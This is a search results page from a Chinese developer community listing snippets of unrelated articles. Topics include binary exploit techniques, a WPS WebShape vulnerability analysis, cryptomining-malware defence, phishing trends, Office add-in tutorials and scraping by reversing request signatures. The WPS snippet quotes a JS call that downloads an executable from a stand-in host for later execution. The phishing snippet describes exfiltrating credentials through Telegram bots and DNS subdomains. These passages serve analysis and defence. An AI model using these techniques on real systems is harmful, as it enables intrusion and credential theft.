文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

矛与盾 | 二进制漏洞攻防思想对抗

就算新版,也有可以通过覆盖SEH链来实现漏洞利用,所以这一次防守短期内基本没有达到预期目的。 0×2 第二回合SafeSEH 守方:兵来将挡,水来土屯。...攻方D:说是这么说,第一回合我们就损失了小部分战场,要是有软件在数据空间找不到jmp esp呢? 攻方E:管不了那么多了,再说了不是还有浏览器这类支持JS脚本的软件吗?...(2)对于支持JS等脚本的软件,直接通过脚本申请堆空间写入shellcode,覆盖SEH链指向堆上的shellcode地址。 0×3 第三回合DEP 守方:攻方太狡猾了,简直是欺人太甚。...攻方B:这JS也不好用,不但卡,还经常挂,成功率受影响啊,要是有别的脚本语言就好了。 攻方大神(眼前一亮):别的脚本语言没有,Flash不是可以自己编写AS代码吗?...随着ASLR+DEP防护的加强,Office还额外增加了一些防护手段,二进制文档漏洞难以为继,曾经的宏病毒摇身一变又杀了回来。当然,宏依然是不能够自动执行,但是可以通过文档内容,诱使人点击执行。

1.7K61

原创Paper | WPS WebShape 漏洞及利用分析

通过 url @ 绕过再次利用 WPS WebShape 白名单之一访问网页,利用 WPS 自带的 JS API 中的功能实现特定路径文件的删除、下载和运行。...白名单总结 根据以上分析可知有三种方式可以 0click 无提示访问域名: 通过访问注册表 HKEY_CURRENT_USER\Software\kingsoft\Office\6.0\plugins\...WPS JS API 利用 根据网上信息的截图和介绍可以知道,攻击者利用 wps.Office.UploadFileToServer API删除了本地的公式编辑器 Eqnedit.exe ,再使用 window.wps.Office.DownloadFileFromServer...window.wps.Office.DownloadFileFromServer("http://127.0.0.1/download.exe", filepath); 由于 WPS 的 JS API实现的功能和...在其他经典案例里实际上就算完美处理 URL 里域判断问题,也还是有可能导致安全问题的,比如攻击者可以通过寻找信任域网站下面的 XSS 等实现调用这些 API 达到攻击的目的。

3K21
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    微软增强云透明性与安全控制的技术革新

    通过Office 365 Management Activity API,客户与合作伙伴可将安全与合规信号集成至监控、分析与合规管理解决方案中。...该API能提供对内容操作的高可见性,例如潜在安全威胁警报与合规问题。精选合作伙伴已通过预览计划构建早期解决方案,预计夏季开放私有预览。感兴趣者可注册预览计划。2....详情参见Office 365博客。3. Windows 10安全创新通过Windows 10 Device Guard,可实现桌面级锁定仅允许可信应用运行,即使攻击者获取系统完全权限仍能保持防护韧性。...微软承诺持续引领云服务认证标准,通过Azure、Mobility Suite、Office 365及CRM Online等产品提供全覆盖的安全、隐私与合规解决方案。...微软将通过智能安全解决方案推动技术创新与业务流程变革,更多细节将于未来数月公布。标签: クラウド, セキュリティ 相关技术: API集成、加密技术、身份管理、合规框架、云服务架构

    17310

    【玩转云函数】腾讯云云函数结合金山文档打造轻量级 Office 在线预览服务

    虽然有公开的微软 Office 预览服务以及 kkfileview 等实现方案,但仍然存在诸多问题,比如微软 Office 预览的大小限制,kk 的略微繁重。...难道如果我只是想要一个轻量级的文档服务就那么难吗?...探讨可行性 首先问题的关键在于通过后端服务去获取预览地址并通过一个网页去承载金山的预览服务,幸运的是这些都可以通过云函数做到,首先云函数是支持 Node.js 编写的,所以我们只要使用 Node.js...去请求金山的接口获取预览地址,然后通过设置函数返回类型为网页就可以将预览地址嵌入函数返回的 iframe 中来实现预览功能,是不是很简单易用。...建站计算资源云函数 SCF、文件存储 CFS、云原生数据库 TDSQL-C、内容分发 CDN、API 网关资源月月送。 点击 ? 「阅读原文」,查看领取惊喜福利!

    1.1K40

    挖矿木马产业链深度解析:传播路径与终极清除方案(附腾讯云安全防护指南)

    本文通过溯源攻击链揭示其传播路径,提出"检测-隔离-修复"三位一体清除策略,并结合腾讯云主机安全,为企业构建多层防御体系提供实战方案。 一、挖矿木马的五大传播通道 1....恶意邮件钓鱼 伪装手段:伪造财务通知、软件更新等诱骗点击 载荷类型:JS挖矿脚本、Office宏病毒 4....腾讯云方案 实时流量分析 DPI深度包检测 主机安全内置IDS 进程行为监控 API...其三大核心优势——智能威胁情报的主动防御、轻量化部署的极致性能、等保合规的一站式达标,已助力金融、政务、能源等关键行业客户实现安全效能提升300%以上。...立即行动: 登录https://console.cloud.tencent.com/cwp,免费领取7-14天主机安全旗舰版 拨打4009100100转1获取专属安全架构师服务

    30110

    Script Lab 05:Office JavaScript API助手,Excel 基础操作(3)

    本期我们就来讲讲 OfficeHelpers 的故事,这是 OfficeJS 提供的一个 Office JavaScript API 助手(office-js-helpers),用以简化 WebAdd-ins...这是一个开源项目,官网地址如下: https://github.com/OfficeDev/office-js-helpers OfficeHelpers 【功能】 OfficeHelpers 命名空间下...@types/office-js 【示例】 从功能性来讲,其最重要的功能之一便是认证(Authenticator)。...小编未来可以很方便的把教程相关的代码,直接分享到GITHUB上,方便大家一键获到(通过一个gist链接即可)。 从今天开始,代码和相关资源,都将分享在以下的QQ学习群上,方便大家自取。...基础操作(1) Script Lab 04:Script Lab,九九乘法表,Excel 基础操作(2) Script Lab 05:Office JavaScript API助手,Excel 基础操作

    2.8K10

    选型宝访谈:深度协作时代,微软Office 365如何驾驭安全隐患?

    通过内置的隐私、透明度和更精准的用户控制,用户可以更好地控制数据的安全性和合规性。...作为全球合规性领导者,微软借助Office 365,将安全性和合规性提升到新的层次。 可以说,Office 365是有史以来最安全的 Office。...李维良 既然Office 365是公有云服务,那它是不是只能在线使用,在没有网络连接的情况下,还能正常使用吗?使用Office 365时,数据是不是必须存在云上?...Jason Office 365可以在本地使用。...当您用不同的设备办公,或希望与他人共享文档时,就可以轻松通过云端来获取,无需借助第三方工具。 李维良 针对企业用户,Office 365有哪些版本?这些版本在功能和收费标准上有什么区别?

    95241

    拼多多数据抓取:Python 爬虫中的 JS 逆向基础案例分析

    例如,当我们在拼多多搜索 “手机” 时,浏览器的网络请求中会出现一个获取商品列表的接口,其请求参数包含一串加密的sign值。...以拼多多网页版商品列表接口为例:打开拼多多网页版,搜索 “手机”;打开开发者工具的「Network」标签,筛选「XHR/Fetch」类型的请求;找到商品列表对应的接口(如/api/search/get)...我们可以通过观察代码中的加密函数(如 MD5、SHA256 等哈希函数,或自定义的拼接加密),确定sign的生成规则。...四、JS 逆向的进阶与合规性说明1....同时,必须牢记合规性原则,将技术用于合法的场景中。通过本文的案例,希望能帮助入门者迈出 JS 逆向的第一步,为后续的爬虫开发和数据分析工作打下基础。

    53910

    uni-app对接金山文档在线预览服务

    最近公司项目中需要在uniapp接入金山文档预览服务,这里记录一下接入方法 需求是在移动端H5里可以进行团队协作,支持预览编辑office文件。...前端:根据文件格式(Word、Excel、PPT 等)生成访问金山文档的 url,通过 js-sdk 接入,调用相关 API 来实现相关需求。...服务端:根据金山文档在线预览编辑服务提供的回调 API 实现接口,将数据存储到对接方的公网服务器中。 可以通过 4 个步骤,快速接入金山文档在线预览编辑服务。...后端接入 这里后端有专人负责,所以不再赘述,有兴趣的可以参考官方文档的服务端Demo uni-app前端接入 js-sdk下载 使用之前,请先下载最新版本的 js-sdk 代码。...important; } 说明: 本示例是在点击文件时获取预览地址将地址存入localStorage(当然你也可以使用query传参的方式)之后在预览页取出后调用sdk进行初始化从而实现预览功能,仅供参考

    3.8K40

    基于开源方案构建统一的文件在线预览与office协同编辑平台的架构与实现历程

    整合OnlyOffice实现Office文档在线预览与编辑 让业务代码无耦合的方式使用预览能力 OnlyOffice作为一个负责office在线预览的功能组件,其提供了一个JS API方法。...具体使用的时候,需要在HTML页面中引用其提供的JS文件并调用对应API方法将请求参数传递给OnlyOffice进行处理。...界面,并在界面中完成使用OnlyOffice的JS api请求的操作。...在独立的JS文件中,接收从JAVA逻辑中传入的参数信息,然后转换封装为OnlyOffice需要的格式,然后调用OnlyOffice的API接口发送请求 这样就实现整体的交互封装,业务可以代码无耦合的方式来直接使用预览能力...并且通过定期探测机制,及时将不可用的OnlyOffice节点从候选列表中剔除掉,保证了请求始终在可用节点上,有效避免了单点问题的出现,也一定程度上缓解单个节点的压力(社区版本同时仅支持20并发数、通过一定策略可以分散不同文件的请求到不同节点上

    5K52

    ONLYOFFICE Online vs LibreOffice Online :谁才是你的在线办公首选

    ,突出开源 部署形态 提供 Docker 镜像、社区/企业版分级 通过 Collabora CODE 提供部署镜像 用户体验目标 类 Office 365 / Google Docs 的交互体验 桌面...强大审阅模式 ✅ 支持但界面简洁 权限控制(只读/评论/填表) ✅ 精细权限控制 ❌ 仅能依赖 WOPI 基础权限位 表格保护/区域编辑权限 ✅ 支持受保护区域编辑 ❌ 不支持细节权限划分 集成与 API...能力 集成能力 ONLYOFFICE Online LibreOffice Online REST API + JS SDK ✅ 丰富的文档与事件接口 ❌ 原生不提供 REST 接口 WOPI 协议支持...✅ 可选支持,非必需 ✅ 必须依赖 WOPI 插件系统 ✅ 支持 JS 插件、Office 宏 ⚠️ 插件能力较弱,生态较小 嵌入平台 ✅ 支持 JWT 签名 + 回调控制 ⚠️ 嵌入需自己开发配套逻辑...选择一款在线 Office 编辑引擎,不仅仅是考虑“能不能用”,更要考虑: 文档格式复杂度是否高? 用户是否要求多人实时编辑? 需要权限控制和审计吗? 是否需要对接已有系统或 App?

    1.8K10

    推荐一波实用高效的 NPM 工具包,总有几款适合你

    js 中有 RegExp 方法做正则表达式校验,而 path-to-regexp 可以看成是 url 字符串的正则表达式。...二者拥有类似的 API,只要你接触过 Moment.js,就能够快速上手 Day.js。...它通过解析代码并使用自己的规则(限定最大行长)对代码进行重新输出,借此实现统一的样式; prettier-office 安装 yarn add --dev --exact prettier 示例 创建...您可以通过易于上手且功能丰富的 API 编写测试,从而快速获取结果。 jest-office 安装及示例 yarn add --dev jest 测试sum函数,这个函数的功能是两数相加。...可以通过以下方法列出所有正在运行的应用程序: $ pm2 ls 查阅官方文档[22],以获取 PM2 功能给的完整列表。

    5.2K40

    在前端如何玩转 Word 文档

    在前端我们可以通过 FileReader API 来读取文件的内容,此外该接口也提供了 readAsArrayBuffer 方法,用于读取指定的 Blob 中的内容,一旦读取完成,result 属性中保存的将是被读取文件的...在获取 Word 文档对应的 ArrayBuffer 对象之后,就可以调用 convertToHtml 方法,把 Word 文档内容转换为 HTML 文档。...首先你可以通过以下两种方式来安装它: npm:npm install turndown script:js...Docx 这个库提供了优雅的声明式 API,让我们可以使用 JS/TS 轻松生成 .docx 文件。此外,它还同时支持 Node.js 和浏览器。...在该回调函数内,首先会创建新的 Document 对象,然后使用 fetch API 从 Github 上下载阿宝哥的头像,当成功获取图片的数据之后,会继续调用 docx.Media.addImage(

    6.3K30

    Node.js 中间件开发:集成天远银行卡黑名单接口与数据清洗实战

    1.敏捷时代的支付安全在构建电商收银台、聚合支付或转账功能时,前端往往需要快速获得反馈:“这张卡能用吗?”后端则需要确保资金合规:“这张卡涉案吗?”Node.js是连接这两端的最佳桥梁。...利用银行卡黑名单(实时)接口,我们可以在Node.js中间层(BFF)快速拦截高危卡片。...可以使用Node.js的Stream流式处理,读取Excel/CSV文件,并发调用API进行清洗。技巧:使用Promise.all控制并发度(如每次5个),防止瞬间QPS过高。...5.总结Node.js+银行卡黑名单API,是构建灵活性与安全性兼备的支付系统的理想选择。通过仅几十行代码,我们就能利用AES加密技术,接入国家级的金融风险名单库,为企业的每一笔资金流动保驾护航。...对接规范与隐私合规重要提示在享受API带来的风控便利时,开发者必须时刻绷紧“安全与合规”这根弦。

    22010

    Microsoft登顶钓鱼仿冒榜首,Roblox成青少年“数字陷阱”——2025年Q4全球品牌冒充攻击全景透视

    数据外传:从Webhook到Telegram Bot收集到的凭据通常通过以下方式外传:Webhook推送:使用Discord、Slack或自定义API接收数据;Telegram Bot:如前文所述,利用...Bot API实时推送;DNS隐蔽通道:将凭据编码为子域名(如user:pass@attacker[.]xyz),通过DNS查询泄露。...成功获取凭据后,攻击者:导出学生个人信息(姓名、出生日期、家庭地址);利用教师身份向家长群发“紧急捐款”链接;将部分账号转售至暗网,售价$50–$200/个。...-- 确保加载的JS未被篡改 -->office.com/auth.js"integrity="sha384-abc123..."...芦笛说,“当你下次看到‘立即验证’的按钮,请先问一句:它真的来自那里吗?”在这个仿冒比真实更逼真的世界,保持怀疑,或许是我们最后的自由。编辑:芦笛(公共互联网反网络钓鱼工作组)

    10810

    【玩转腾讯云】腾讯云云函数结合金山文档打造轻量级office在线预览服务

    虽然有公开的微软office预览服务以及kkfileview等实现方案,但仍然存在诸多问题,比如微软office预览的大小限制,kk的略微繁重。 难道如果我只是想要一个轻量级的文档服务就那么难吗?...探讨可行性 首先问题的关键在于通过后端服务去获取预览地址并通过一个网页去承载金山的预览服务,幸运的是这些都可以通过云函数做到,首先云函数是支持nodeJS编写的,所以我们只要使用nodejs去请求金山的接口获取预览地址...,然后通过设置函数返回类型为网页就可以将预览地址嵌入函数返回的iframe中来实现预览功能,是不是很简单易用。...script>location.replace("${previewRes.data.wpsUrl}");` } } 问题记录 细心的同学会发现在云函数返回体部分在这里写的是一段js...这里之所以没有使用iframe去嵌入预览地址是因为会报获取token失败的错误,所以退而求其次采取了直接跳转到预览地址的方式来查看文件。

    1.6K00

    微软WebAddins与WPSJS两种开发技术的比较

    背景 对微软OFFICE开发技术有所了解的群体,想必也略为知道一点其新的WebAddins插件开发的形式。在OFFICE2013开始,有了OFFICE的应用商店,可以在其中下载安装新的插件。...可能在企业市场上会好一点,可以集中部署。但传统OFFICE开发者相信不买单,想接触企业级定制开发,没那么容易。...4.微软WebAddins没有类似VBA那样的录制宏功能辅助生成JS代码 有对比才有差距,这一点WPS反而领先一步了,最新的WPS版本已经支持类似以前的VBA录制宏的效果,通过录制js宏,快速生成js代码...在最新的WPS版本中,甚至支持使用js宏来操作OFFICE,类似VBA操作OFFICE那样,最终js宏代码保存到xlsm文件里,即可使用,这个更为彻底的离线方案,无需安装插件,一份js宏代码跟着文件走,...当然这些的代价就是合规化,正版化为前提。

    1.2K30

    Android 隐私合规检查工具套装

    并且,对于一心只想解决隐私 api 调用情况的 UI 仔来说,Xposed 方案有点过重 对于 transfrom 插桩来说,这完全就不是一个可行方案,如果你在 transform 阶段做静态扫描,那完全可以通过依赖扫描来解决...那你就要写很多的模版代码,那未来隐私 api 再增加呢,再去写一遍模版代码吗?这后期维护也太难了。 动态检查的唯一解只有运行时 AOP Hook。...后面搜到 frida gadget [13]方案,可以直接配置 js 脚本来实现 hook,无需 frida-server: 大体实现步骤: 下载 android arm 架构的 frida-gadget.so...[14], 由于 Release 产物比较多,需要点击 Assets 展开更多 创建 script.js 脚本文件,实现隐私 api 的 hook 将 frida-gadget.so[15] 与 script.js...会读取 frida-gadget.config.so 中的 path 路径,获取到 script.js 文件,并执行该 js 脚本 运行效果如下: 该方案的优点不需要 root,并且机型适配比较好,frida

    2.5K11

    Java全栈开发面试实战:从基础到高阶的全面解析

    你对Java 8的新特性了解吗?比如Lambda表达式、Stream API等。...**李明远:** 是的,Java 8引入了很多新特性,比如Lambda表达式可以简化代码,让函数式编程更加方便;Stream API则提供了更强大的集合处理能力,像filter、map、reduce这些操作...**张老师:** 很好,那你能举一个实际的例子说明你是如何使用Stream API的吗? **李明远:** 比如我在上一个项目中,需要从一个用户列表中筛选出所有活跃用户,然后计算他们的总消费金额。...### 第二回合:前端技术栈与框架 **张老师:** 接下来,我想了解一下你在前端方面的技术栈。你有没有使用过Vue.js或者React?...通过真实的代码示例和问题解答,可以看出应聘者对技术的理解较为深入,具备良好的工程实践能力。对于初学者来说,这样的面试内容是一个很好的学习参考,能够帮助他们掌握主流技术栈的应用方式。

    8410

    天远大数据个人风险报告技术实现全解析

    二、数据基石:合规API接口与模块化聚合一份专业个人风险报告的价值,在于其丰富的数据维度。这些数据通过调用一系列稳定、合规的API数据接口聚合而成。...配置化API调度:后端服务会根据预设的配置(如DEFAULT_API_CODES列表),动态确定本次查询需要调用哪些内部API模块。...从其代码库中的risk-query.vue和useRiskReport.js可以看出实现思路:SEO优化:在页面组件中,通过useHead明确设置了页面的title, description, 和 keywords...逻辑与视图分离:useRiskReport.js作为一个Vue Composable,专门负责数据获取和状态管理。...它通过useAsyncData从后端API获取完整的JSON数据,并将数据、加载状态、错误信息等响应式地提供给UI组件。

    81000
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券